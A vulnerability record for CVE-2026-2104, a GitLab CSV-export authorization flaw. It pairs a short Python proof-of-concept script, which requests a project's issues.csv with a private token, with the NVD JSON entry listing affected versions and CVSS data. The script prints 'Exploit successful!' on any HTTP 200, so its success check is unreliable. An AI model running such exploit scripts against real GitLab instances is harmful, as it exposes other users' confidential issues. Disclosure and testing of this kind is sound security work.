CVE-2026-2104

import requests # Configuration target_url = "https://your-gitlab-instance.com" token = "YOUR_PRIVATE_TOKEN" project_id = "123" # Headers for authentication headers = { "PRIVATE-TOKEN": token } # The vulnerable endpoint for exporting issues as CSV # Vulnerability allows accessing confidential issues assigned to others url = f"{target_url}/api/v4/projects/{project_id}/issues.csv" try: response = requests.get(url, headers=headers) if response.status_code == 200: print("[+] Exploit successful! CSV data received.") print("[+] Data preview:") print(response.text[:500]) # Print first 500 chars else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

{"cve": {"id": "CVE-2026-2104", "sourceIdentifier": "[email protected]", "published": "2026-04-08T23:16:58.393", "lastModified": "2026-04-14T16:57:57.377", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 18.2 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an authenticated user to access confidential issues assigned to other users via CSV export due to insufficient authorization checks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.2.0", "versionEndExcluding": "18.8.9", "matchCriteriaId": "CFAD5EB0-9700-4C16-AEF0-27599F84541F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.5", "matchCriteriaId": "3BA6A89D-D2C1-45B9-A8E8-64256816D880"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.3", "matchCriteriaId": "BB2F3665-2451-4A4D-8538-93F540975F0E"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.2.0", "versionEndExcluding": "18.8.9", "matchCriteriaId": "6E8B1FB2-AA24-4447-8403-F082B4DCA62A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.9.0", "versionEndExcluding": "18.9.5", "matchCriteriaId": "5C4D8A99-6E70-4D55-9ACF-FF2620F070E0"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:*", "versionStartIncluding": "18.10.0", "versionEndExcluding": "18.10.3", "matchCriteriaId": "DBCB346F-0B28-458B-A453-29DA4B0E91FC"}]}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/", "source": "[email protected]", "tags": ["Vendor Advisory", "Release Notes"]}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/589021", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://hackerone.com/reports/3541476", "source": "[email protected]", "tags": ["Permissions Required"]}]}}